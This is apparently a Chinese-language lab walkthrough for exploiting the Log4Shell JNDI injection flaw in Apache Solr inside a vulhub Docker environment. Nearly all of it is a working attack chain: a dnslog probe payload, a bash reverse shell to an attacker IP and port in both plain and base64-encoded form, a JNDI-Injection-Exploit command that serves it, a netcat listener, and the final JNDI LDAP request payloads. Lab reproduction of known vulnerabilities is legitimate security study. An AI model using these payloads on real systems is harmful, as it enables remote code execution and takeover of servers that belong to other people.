1.在vulhub中打开环境
进入环境所在的文件 打开环境
docker-compose up -d
2.浏览器访问打开环境
3.使用dnslog查看是否存在漏洞
solr/admin/cores?action=${jndi:ldap://${sys:java.version}.9dbu98.dnslog.cn
发现可以返回java版本 说明存在漏洞
4.开始反弹shell
下载jdni放到攻击机
反弹shell
bash -i >& /dev/tcp/192.168.10.233/8888 0>&1
反弹shell经过base-64编码
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=
最终payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwLjIzMy84ODg4IDA+JjE=
}|{base64,-d}|{bash, -i}" -A "192.168.10.233"
5.服务器监听
nc -lvvp 8888
6.使用jdk1.8的payload直接访问
/solr/admin/cores?action=${jndi:ldap://192.168.10.233:1389/o2qeea} ${jndi:ldap://192.168.10.233:8888/uma7pn}